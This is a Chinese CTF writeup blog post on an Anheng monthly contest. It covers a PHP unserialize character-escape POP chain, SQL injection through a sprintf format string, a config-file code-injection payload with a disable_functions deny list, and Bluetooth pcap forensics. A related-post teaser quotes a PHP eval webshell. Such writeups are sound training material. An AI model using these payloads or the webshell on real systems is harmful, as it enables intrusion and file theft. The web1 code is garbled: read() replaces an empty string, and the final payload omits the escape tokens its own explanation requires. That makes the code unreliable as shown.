安恒赛php_安恒四月赛部分Writeup

最新推荐文章于 2021-02-05 12:36:24 发布
最新推荐文章于 2021-02-05 12:36:24 发布
阅读量194 收藏
点赞数
文章标签: 安恒赛php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39551554/article/details/111800524
版权

前言

这周有安恒的月赛,

又是膜师傅的一天

学到了一些骚姿势:

web

web1

打开题目发现给出了源码:

show_source("index.php");

function write($data) {

return str_replace(chr(0) . '*' . chr(0), '', $data);

}

function read($data) {

return str_replace('', chr(0) . '*' . chr(0), $data);

}

class A{

public $username;

public $password;

function __construct($a, $b){

$this->username = $a;

$this->password = $b;

}

}

class B{

public $b = 'gqy';

function __destruct(){

$c = 'a'.$this->b;

echo $c;

}

}

class C{

public $c;

function __toString(){

//flag.php

echo file_get_contents($this->c);

return 'nice';

}

}

$a = @new A($_GET['a'],$_GET['b']);

//省略了存储序列化数据的过程,下面是取出来并反序列化的操作

$b = unserialize(read(write(serialize($a))));

我们来分析一下:

function write($data) {

return str_replace(chr(0) . '*' . chr(0), '', $data);

}

function read($data) {

return str_replace('', chr(0) . '*' . chr(0), $data);

}

这个写函数,当反序列化存储的私有成员是,会有chr(0)的出现,所以会对chr(0) . '*' . chr(0)进行一个替换,当读取的时候会对进行一个还原。

看似没有什么问题,但是当我们可以的存储进行wirte()时不会发生改变。但是进行read()时,会变为chr(0) . '*' . chr(0)由六字符变为三字符,可以实现字符逃逸。。。

我们可以明显看到在 read 函数处理后,原先字符中的 被替换成 chr(0).'*'.chr(0),但是字符长度标识不变 。所以在进行反序列化的时候,还会继续向后读取,这样序列化的结果就完全不一样了。

所以来看一下如何构造pop链。

class A{

public $username;

public $password;

function __construct($a, $b){

$this->username = $a;

$this->password = $b;

}

}

class B{

public $b = 'gqy';

function __destruct(){

$c = 'a'.$this->b;

echo $c;

}

}

class C{

public $c;

function __toString(){

//flag.php

echo file_get_contents($this->c);

return 'nice';

}

}

class C存在file_get_contents()函数,可以读取文件内容,可以让$c为flag.php,并且存在__toString()魔术方法。。 class B函数存在echo 那么大致思路就出来了

class A{

public $username;

public $password;

function __construct($a, $b){

$this->username = $a;

$this->password = $b;

}

}

class B{

public $b;

function __destruct(){

$c = 'a'.$this->b;

echo $c;

}

}

class C{

public $c = 'flag.php';

function __toString(){

//flag.php

echo file_get_contents($this->c);

return 'nice';

}

}

$aaa = new A();

$bbb = new B();

$ccc = new C();

$bbb->b=$ccc;

// echo serialize($bbb);

$aaa->password=$bbb;

echo serialize($aaa);

得到O:1:"A":2:{s:8:"username";N;s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}

因为要造成反序列化逃逸:所以password值为:";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

带入反序列化的解果为:O:1:"A":2:{s:8:"username";s:3:"aaa";s:8:"password";s:72:"";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}";}

所以我们要逃逸的字符为:";s:8:"password";s:72:"一共23个字符,但是替换为chr(0) . '*' . chr(0)一次逃逸3个字符,所以要是三的倍数。。所以password为A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

username为24个;

payload:

a=&b=A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

web2

打开页面是一个登陆框:

尝试一下发现存在waf,

于是看一下都过滤了写什么函数。。

发现过滤的挺多的,也挺全的,一时没有了解头绪

看一下源代码,发现了收获,2333

这个%s让我想到了格式化字符串的漏洞。。

上网找到这样的一篇文章参考文章

发现骚姿势,SQL注入可以和格式化字符串一起使用

例如:

$input1 = '%1$c) OR 1 = 1 /*';

$input2 = 39;

$sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";

$sql = sprintf($sql, $input2);

echo $sql;

输出为select * from foo where bar in('') or 1=1 /*') and baz=39

%c起到了类似chr()的效果,将数字39转化为',从而导致了sql注入。

我们尝试一下利用这种方法

得到了账户密码

发现是admin用户的密码猜测存在后台,找到了后台的位置/admin

然后进行登陆,发现,这是一个套娃题 。。 淦

这里面对发现了眼熟的代码:

是一个经典的配置文件写入问题漏洞.参考链接

payload:

a';phpinfo();//

然后再shell.php看到了phpinfo()的界面。。

我以为就可以得到flag了。。谁知道有disable_functions

set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,error_log,dl,FFI::cdef,debug_backtrace,imap_mail,mb_send_mail

想到了题目给了一个so文件。。猜测是上传so文件来进行提权操作。。。但是尝试了半天无果。。这应该是最后一步了,并且好多人在搅屎

最后两分钟有大佬拿到了一血

tql。

MISC

blueshark

打开题目,发现这是一个蓝牙协议:

发现存在一个7z的压缩包。提示压缩包密码为PIN码

一个骚操作将pcap文件后缀改为zip可以得到这个压缩包。。。

然后找到了PIN码的流量,得到PIN码

打开压缩包,得到flag

6G还远吗?

刚开始发现是下载的779MB的文件,就点击下载了,然后去看别的题目了,但是过一会发现这个下载速度不对呀。。意识到事情有一丝丝的不对。。嘿嘿

暂停下载找到下载的临时文件打开得到了flag

总结

这次月赛,学到了一些新知识,以及骚操作

大佬们都tql。。。

参考链接

weixin_39551554
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安恒赛php_安恒11月月周周练writeup
weixin_39881513的博客
12-21 313
前言11月月 完美错过时间,正好有周周练,基本都是一样月的web,记录下write up手速要快这题是10月月中的一题,直接看我上次的writeup:安恒(十)web-2题writeup,这里不重复了image_upimage.png随意输入username和password登陆,image.png随意尝试上传了文件,好像只能jpg结尾,上传后无回显任何内容。page=upload当前页...
【4.29安恒杯】writeup
aodiyi6351的博客
08-06 405
#### 安恒杯_writeup 下面为比中做出的题目 MISC: SHOW ME THE FLAG-by-cyyzore CRYPTO: LAZYATTACK-by-GoldsNow 这一题非常巧。所有的队伍里面仅仅有我们一个队伍将其做出来。 这一题做出来完全然全是靠运气,在当我做出这一题的时候感觉是懵逼的,全然不知道是怎么回事...
安恒赛php_CTF-安恒18年十一月月部分writeup
weixin_39784460的博客
12-21 177
安恒十一月月writeup昨天做了一下十一月的题目,不才只做出来几道签到web1这个是十月的原题,因为忘了截图所以只能提供思路Web消息头包含了登陆框的密码输入密码后进入上传页面,上传一句话木马1.jpg,使用burp将上传文件名改为1.php.jpg然后post数据发现已经getshellFlag就在上一层目录里所以post数据:system(‘dir ../’);得出flag为:flag{6...
CTF-安恒18年十一月月部分writeup
weixin_33786077的博客
12-14 615
安恒十一月月writeup 昨天做了一下十一月的题目,不才只做出来几道 签到web1 这个是十月的原题,因为忘了截图所以只能提供思路 Web消息头包含了登陆框的密码 输入密码后进入上传页面,上传一句话木马1.jpg, <?php @eval($_POST['cmd']);?> 使用burp将上传文件名改为1.php.jpg 然后post数据发现已经getshel...
【转载】安恒八月月流量分析writeup
gclome的博客
08-25 2961
本文转载自:https://www.cnblogs.com/sn1per/p/12553064.html 一、题目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是
安恒杯月题目参源码+项目说明.zip
最新发布
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞项目学习资料,作为参考学习借鉴。 ...安恒杯月题目参源码+项目说明.zip
安恒云-crx插件
04-03
安恒云提供本地化的增强功能安恒云是杭州安恒信息技术股份有限公司推出的集多云管理和多云安全于一体的一站式服务平台。安恒云可连接国内外主流公有云、私有云、传统IDC数据中心,让用户公平选云、安全上云、便捷...
2018-10月安恒逆向题目
10-29
2018年10月安恒逆向题目。
安恒堡垒机配置说明.zip
03-16
安恒堡垒机配置详解与应用实践》 在网络安全领域,堡垒机作为一种重要的安全设备,承担着运维审计、访问控制和安全防护等多重任务。安恒堡垒机,作为国内知名的网络安全解决方案之一,提供了强大的功能和易用的...
安恒四月春季战 - web
A_dmin的博客
04-25 928
安恒四月春季战 - web - Ezunserialize 打开获取到源码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { return ...
2020安恒4月pwn(看看还能不能更)
doudoudedi
04-25 705
orz没赶上回家已经5点半了就回顾了一下pwn题 挺好的出的 思路 就是uaf控制好堆块然后写到got表leaklibc然后再次做一次写free为system即可 exp: #!/usr/bin/python2 from pwn import * def pwn(): p=process('./sales_office') elf=ELF('./sales_office') libc=ELF...
php4fun
wusuopuBUPT的专栏
01-23 2295
php4fun : http://php4fun.sinaapp.com/ 攻略:http://drops.wooyun.org/papers/660
2020.4月安恒之杂项
cm_zl
04-25 623
blueshark 发现是取证题,首先寻找特殊字符串,找到一个what_you_want.7z 下面的16进制头是377abc是7z压缩包文件头,将之复制出到winhex。 保存7z压缩包,里面有一个加密文件。提示密码是蓝牙密码。 在wireshark中查找字符串,PIN,发现密码 最后打开文件,得到flag flag{快去试试吧!} ...
安恒赛php_DASCTF6月
weixin_40007541的博客
12-21 273
因为和第五空间连着,然后昨天下午又去打了一场AWD,感觉身体掏空,就认真打了DASCTF(咕咕咕),剩下的题目等有机会再复现简单的计算器-1考点:python eval()代码注入,命令执行结果外带访问Source可以看到源码:#!/usr/bin/env python3# -*- coding: utf-8 -*-from flask import Flask, render_template,...
安恒赛php_安恒429|复 web write up && 决经验
weixin_36316642的博客
02-05 237
由于已经没有复的环境,只能文字回忆一下了复给了web 2 350 原本是想考一个SSRF利用gopher去搞定一个fastcgi的外联端口,执行命令具体的文章http://zone.wooyun.org/content/1060http://drops.wooyun.org/web/9845然而出题人没把好关 长亭3分钟秒掉这道题后基本就猜到有奇解那么其实就是简单的file协议 file://...
php函数serialize()与unserialize()
larance的挨踢生活
08-31 841
本文转自:http://zxianf.blog.163.com/blog/static/30120701201072443623381/ php函数serialize()与unserialize()说明及案例。想要将已序列化的字符串变回 PHP 的值,可使用unserial
安恒5月&BJDCTF3th-逆向
re1wn
07-28 6080
萌新学习之路
2019安恒七月月——MISC
Lemon's blog
07-17 1151
前言:作为一个小白,感觉安恒的题是真的难,但也要努力复现出来,也可以多学很多东西。 真正的CTFer 一张图片,还是之前的老思路,winehx查看,binwalk分离等等,但是都没有如何线索,再仔细观察图片,发现应该是高度被修改了,下面应该还隐藏有图片 查看一下被修改过后的高度 这里也不知道图片原高度为多少,就往大的方向整 我这里直接将05改为了0C,结果过大了 下方有空白,改成0A没有空...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值